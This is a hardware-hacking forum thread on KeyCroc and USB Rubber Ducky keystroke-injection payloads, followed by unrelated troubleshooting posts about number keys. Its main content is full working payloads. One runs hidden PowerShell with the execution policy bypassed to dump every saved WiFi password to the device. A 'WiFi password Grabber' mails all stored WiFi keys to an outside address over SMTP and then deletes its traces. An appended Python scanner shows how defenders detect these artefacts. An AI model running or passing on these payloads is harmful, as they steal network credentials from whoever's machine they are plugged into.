# --> Open cmd
QUACK GUI r
QUACK DELAY 500
# --> Open powershell
QUACK STRING "powershell -NoP -NonI -W Hidden -Exec Bypass"
QUACK ENTER
QUACK DELAY 1000
# --> Get KeyCroc drive
QUACK STRING "\$Croc = (gwmi win32_volume -f 'label=\"KeyCroc\"' | Select-Object -ExpandProperty DriveLetter)"
QUACK ENTER
QUACK DELAY 1000
# --> Create Wifipasswd.txt with all SSID and PASSWD put in Keycroc loot folder
QUACK STRING "(netsh wlan show profiles) | Select-String \"\:(.+)\$\" | % {\$name=\$_.Matches.Groups[1].Value.Trim(); \$_} | %{(netsh wlan show profile name=\"\$name\" key=clear)} | Select-String \"Key Content\W+\:(.+)\$\" | % {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | %{[PSCustomObject]@{ PROFILE_NAME=\$name;PASSWORD=\$pass }} | Format-Table -AutoSize | Out-File \"\$Croc\loot\Wifipasswd.txt\""
QUACK ENTER
QUACK DELAY 1000
# --> Create wifipass.txt with the target pc SSID and PASSWD put in Keycroc loot folder
QUACK STRING "(netsh wlan show networks) | Select-String \"\:(.+)\$\" | % {\$name=\$_.Matches.Groups[1].Value.Trim(); \$_} | %{(netsh wlan show profile name=\"\$name\" key=clear)} | Select-String \"Key Content\W+\:(.+)\$\" | % {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | %{[PSCustomObject]@{ PROFILE_NAME=\$name;PASSWORD=\$pass }} | Format-Table -AutoSize | Out-File \"\$Croc\loot\wifipass.txt\""
QUACK ENTER
QUACK DELAY 1000
# --> Open notepad with the KeyCroc config.txt
QUACK STRING "notepad \$Croc\config.txt"
QUACK ENTER
# --> Edit the config.txt
QUACK DELAY 1000
QUACK CONTROL-g
QUACK DELAY 500
QUACK STRING "10"
QUACK ENTER
QUACK STRING "WIFI_SSID"
QUACK ENTER
QUACK STRING "WIFI_PASS"
QUACK ENTER
QUACK STRING "SSH ENABLE"
QUACK ENTER
QUACK GUI r
QUACK DELAY 500
QUACK STRING "powershell -NoP -NonI -W Hidden -Exec Bypass"
QUACK ENTER
QUACK DELAY 1000
QUACK STRING "\$Croc = (gwmi win32_volume -f 'label=\"KeyCroc\"' | Select-Object -ExpandProperty DriveLetter)"
QUACK ENTER
QUACK DELAY 500
# --> Open wifipass.txt to copy and paste the SSID and PASSWD
QUACK STRING "notepad \$Croc\loot\wifipass.txt"
QUACK ENTER
QUACK DELAY 1000
# --> Copy and paste the SSID AND PASSWD to the config.txt
QUACK CONTROL-g
QUACK DELAY 500
QUACK STRING "4"
QUACK ENTER
QUACK CONTROL-RIGHTARROW
QUACK CONTROL-RIGHTARROW
# --> Select the whole line
QUACK CONTROL-SHIFT-LEFTARROW
# --> Copy
QUACK CONTROL-c
QUACK DELAY 500
# --> Change windows
QUACK CONTROL-ALT-TAB
QUACK ENTER
QUACK DELAY 500
# --> select line to edit
QUACK CONTROL-g
QUACK DELAY 500
QUACK STRING "11"
QUACK ENTER
QUACK DELAY 500
QUACK CONTROL-RIGHTARROW
# --> SPACEBAR is 00,00,2c
QUACK KEYCODE 00,00,2c
# --> Paste
QUACK CONTROL-v
QUACK DELAY 500
QUACK CONTROL-ALT-TAB
QUACK DELAY 500
QUACK ENTER
QUACK CONTROL-g
QUACK DELAY 500
QUACK STRING "4"
QUACK ENTER
QUACK CONTROL-RIGHTARROW
QUACK LEFTARROW
QUACK CONTROL-SHIFT-LEFTARROW
QUACK CONTROL-c
QUACK CONTROL-ALT-TAB
QUACK DELAY 500
QUACK ENTER
QUACK CONTROL-g
QUACK DELAY 500
QUACK STRING "10"
QUACK ENTER
QUACK CONTROL-RIGHTARROW
QUACK KEYCODE 00,00,2c
QUACK CONTROL-v
QUACK DELAY 500
# --> Save config.txt
QUACK CONTROL w
QUACK ENTER
QUACK DELAY 500
QUACK CONTROL-ALT-TAB
QUACK DELETE
QUACK DELAY 500
# --> Returning to HID Mode
ATTACKMODE HID
QUACK DELAY 5000
QUACK UNLOCK

Thanks to all.

Attachment: getonline.txt
  5. This is a usb rubber ducky payload that I modded into a keycroc payload, so if you like usb rubber ducky payloads it can be done.

WiFi password Grabber

Change the following things:
ACCOUNT: Your hotmail/outlook account
PASSWORD: Your hotmail/outlook password
RECEIVER: The email you want to send the content of Log.txt to

Note: This script will grab not just the current SSID and password your computer is connecting to but every single SSID and password you have previously connected/saved on your computer. And it works even if the WiFi name contains special characters (such as a smiley face) or spaces. I'm not using gmail here because Google is pretty restrictive when it comes to 3rd party app authentication (let me know if it works with other mail servers such as yahoo, zoho, etc). You might want to adjust the DELAY depending on the system you are running, e.g. set a higher delay time if your system is slow.

rubber ducky payload

DELAY 1000
REM --> Minimize all windows
WINDOWS d
REM --> Open cmd
WINDOWS r
DELAY 500
STRING cmd
ENTER
DELAY 200
REM --> Get all SSID
STRING cd %USERPROFILE% & netsh wlan show profiles | findstr "All" > a.txt
ENTER
REM --> Create a filter.bat to get all the profile names
STRING echo setlocal enabledelayedexpansion^
ENTER
ENTER
STRING for /f "tokens=5*" %%i in (a.txt) do (^
ENTER
ENTER
STRING set val=%%i %%j^
ENTER
ENTER
STRING if "!val:~-1!" == " " set val=!val:~0,-1!^
ENTER
ENTER
STRING echo !val!^>^>b.txt) > filter.bat
ENTER
REM --> Run filter.bat and save all profile names in b.txt
STRING filter.bat
DELAY 300
ENTER
REM --> Save all the good stuff in Log.txt and delete the other garbage files
STRING (for /f "tokens=*" %i in (b.txt) do @echo SSID: %i & netsh wlan show profiles name="%i" key=clear | findstr /c:"Key Content" & echo.) > Log.txt
ENTER
DELAY 1000
STRING del a.txt b.txt filter.bat
ENTER
REM --> Mail Log.txt
STRING powershell
ENTER
DELAY 1000
STRING $SMTPServer = 'smtp-mail.outlook.com'
ENTER
STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
ENTER
STRING $SMTPInfo.EnableSSL = $true
ENTER
STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('<your email here>', '<your password here>')
ENTER
STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
ENTER
STRING $ReportEmail.From = '<your email here>'
ENTER
STRING $ReportEmail.To.Add('<email to send to>')
ENTER
STRING $ReportEmail.Subject = 'WiFi key grabber'
ENTER
STRING $ReportEmail.Body = (Get-Content Log.txt | out-string)
ENTER
STRING $SMTPInfo.Send($ReportEmail)
ENTER
DELAY 3000
STRING exit
ENTER
DELAY 500
REM --> Delete Log.txt and exit
STRING del Log.txt & exit
ENTER

keycroc payload

MATCH wifipass
QUACK DELAY 1000
# REM --> Minimize all windows
QUACK WINDOWS d
# REM --> Open cmd
QUACK WINDOWS r
QUACK DELAY 1000
QUACK STRING "cmd"
QUACK ENTER
QUACK DELAY 1000
# REM --> Get all SSID
QUACK STRING "cd %USERPROFILE% & netsh wlan show profiles | findstr \"All\" > a.txt"
QUACK ENTER
# REM --> Create a filter.bat to get all the profile names
QUACK STRING "echo setlocal enabledelayedexpansion^"
QUACK ENTER
QUACK ENTER
QUACK STRING "for /f \"tokens=5*\" %%i in (a.txt) do (^"
QUACK ENTER
QUACK ENTER
QUACK STRING "set val=%%i %%j^"
QUACK ENTER
QUACK ENTER
QUACK STRING "if \"!val:~-1!\" == \" \" set val=!val:~0,-1!^"
QUACK ENTER
QUACK ENTER
QUACK STRING "echo !val!^>^>b.txt) > filter.bat"
QUACK ENTER
# REM --> Run filter.bat and save all profile names in b.txt
QUACK STRING "filter.bat"
QUACK DELAY 1000
QUACK ENTER
# REM --> Save all the good stuff in Log.txt and delete the other garbage files
QUACK STRING "(for /f \"tokens=*\" %i in (b.txt) do @echo SSID: %i & netsh wlan show profiles name=\"%i\" key=clear | findstr /c:\"Key Content\" & echo.) > Log.txt"
QUACK ENTER
QUACK DELAY 1000
QUACK STRING "del a.txt b.txt filter.bat"
QUACK ENTER
# REM --> Mail Log.txt
QUACK STRING "powershell"
QUACK ENTER
QUACK DELAY 1000
QUACK STRING "\$SMTPServer = 'smtp-mail.outlook.com'"
QUACK ENTER
QUACK STRING "\$SMTPInfo = New-Object Net.Mail.SmtpClient(\$SmtpServer, 587)"
QUACK ENTER
QUACK STRING "\$SMTPInfo.EnableSSL = \$true"
QUACK ENTER
QUACK STRING "\$SMTPInfo.Credentials = New-Object System.Net.NetworkCredential(\"your email here\", \"your password here\")"
QUACK ENTER
QUACK STRING "\$ReportEmail = New-Object System.Net.Mail.MailMessage"
QUACK ENTER
QUACK STRING "\$ReportEmail.From = 'your email here'"
QUACK ENTER
QUACK STRING "\$ReportEmail.To.Add('email to send to')"
QUACK ENTER
QUACK STRING "\$ReportEmail.Subject = 'WiFi key grabber'"
QUACK ENTER
QUACK STRING "\$ReportEmail.Body = (Get-Content Log.txt | out-string)"
QUACK ENTER
QUACK STRING "\$SMTPInfo.Send(\$ReportEmail)"
QUACK ENTER
QUACK DELAY 3000
QUACK STRING "exit"
QUACK ENTER
QUACK DELAY 1000
# REM --> Delete Log.txt and exit
QUACK STRING "del Log.txt & exit"
QUACK ENTER
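From the defender's side, the two payloads in posts 4 and 5 leave a recognisable trail in host telemetry: one netsh child per saved profile with `key=clear`, a PowerShell started with `-W Hidden -Exec Bypass`, a WMI lookup for a volume labelled `KeyCroc`, and an SmtpClient built inside PowerShell to mail Log.txt. The scanner below is an added example, not code from the forum thread or from Hak5; the Sysmon-style `key=value` record layout and the sample event lines are constructed assumptions.

```python
import re

# Constructed telemetry for this example: Sysmon-style process-creation events (EventID 1)
# and PowerShell script-block events (EventID 4104); the key=value layout is an assumption.
SAMPLE_EVENTS = [
    "EventID=1 Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "CommandLine=powershell -NoP -NonI -W Hidden -Exec Bypass",
    'EventID=1 Image=C:\\Windows\\System32\\netsh.exe CommandLine=netsh wlan show profile name="HomeNet" key=clear',
    "EventID=4104 ScriptBlockText=$Croc = (gwmi win32_volume -f 'label=\"KeyCroc\"' | Select-Object -ExpandProperty DriveLetter)",
    "EventID=4104 ScriptBlockText=$SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)",
    "EventID=1 Image=C:\\Windows\\System32\\netsh.exe CommandLine=netsh wlan show interfaces",  # benign
]
# One regex per artefact the two payloads leave behind in CommandLine / ScriptBlockText.
RULES = {
    # netsh child spawned per saved profile to print the WLAN key in plaintext
    "wlan_key_dump": re.compile(r"\bnetsh\b.*\bwlan\b.*\bshow\s+profiles?\b.*\bkey=clear\b", re.I),
    # PowerShell started hidden and/or with the execution policy bypassed
    "hidden_bypass_powershell": re.compile(
        r"\bpowershell\b.*(?:-W(?:indowStyle)?\s+Hidden|-Ex(?:ec)?(?:utionPolicy)?\s+Bypass)", re.I),
    # WMI lookup of the removable volume by its "KeyCroc" label
    "keycroc_volume_lookup": re.compile(r"win32_volume.*label=.{0,3}KeyCroc", re.I),
    # .NET mail client built inside PowerShell to send the harvested Log.txt
    "powershell_smtp_exfil": re.compile(r"\bNet\.Mail\.SmtpClient\b", re.I),
}
FIELD_RE = re.compile(r"\b(CommandLine|ScriptBlockText)=(.*)$")

def extract_text(event: str):
    """Return the command line or script block carried by one event line, else None."""
    m = FIELD_RE.search(event)
    return m.group(2) if m else None

def scan(events: list) -> list:
    """Return (rule_name, matched_text) for every event that trips a rule."""
    hits = []
    for event in events:
        text = extract_text(event)
        if text is not None:
            hits.extend((name, text) for name, rx in RULES.items() if rx.search(text))
    return hits

def classify(hits: list) -> str:
    """Escalate when the key dump is paired with any of the supporting artefacts."""
    names = {name for name, _ in hits}
    if "wlan_key_dump" in names and names - {"wlan_key_dump"}:
        return "wifi-credential-harvest"
    return "suspicious" if names else "clean"

if __name__ == "__main__":
    found = scan(SAMPLE_EVENTS)
    print(*found, "verdict: " + classify(found), sep="\n")
```

A lone `netsh wlan show interfaces` stays clean; the verdict only escalates when the plaintext key dump co-occurs with one of the other three artefacts.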
  6. BIG BIG THANKS TO Cribbit and RootJunky. Yes, my Num Lock was on 😕 payloads are working, my bad. THANKS AGAIN GUYS
  7. I am having trouble with all my payloads because they will not print any numbers at the STRING lines. Am I doing something wrong? Is anyone else having the same problem with adding numbers to the STRING?
  8. Hi, been playing around with payloads with my keyCroc. When I use the STRING " " with numbers it will not print the number. As you can see with the output, no numbers get printed. I tried without the quotes and I get the same result, so how do you get it to print a number in a string?

this is the payload

MATCH 12
QUACK STRING "1"
QUACK ENTER
QUACK STRING "2"
QUACK ENTER
QUACK STRING "3"
QUACK ENTER
QUACK STRING "100"
QUACK ENTER
QUACK STRING "\100"
QUACK ENTER
QUACK STRING "\$300"
QUACK ENTER
QUACK STRING "\$1"
QUACK ENTER
QUACK STRING "$1"
QUACK ENTER

this is the output in terminal

└──╼ $12 - this is the match
└──╼ $
└──╼ $~
└──╼ $^[[2~
└──╼ $\^[[2~
└──╼ $$~^[[2~
└──╼ $$

this is the output in text editor notepad

12
\
$
$

I know about "1234" - str - string, 1234 - int - integers, int() - convert a str to an int, and so on. Does this work the same for the croc? Can anyone else get the QUACK STRING " " with any numbers between the quotes to print back, or is it just my croc? Any help, thanks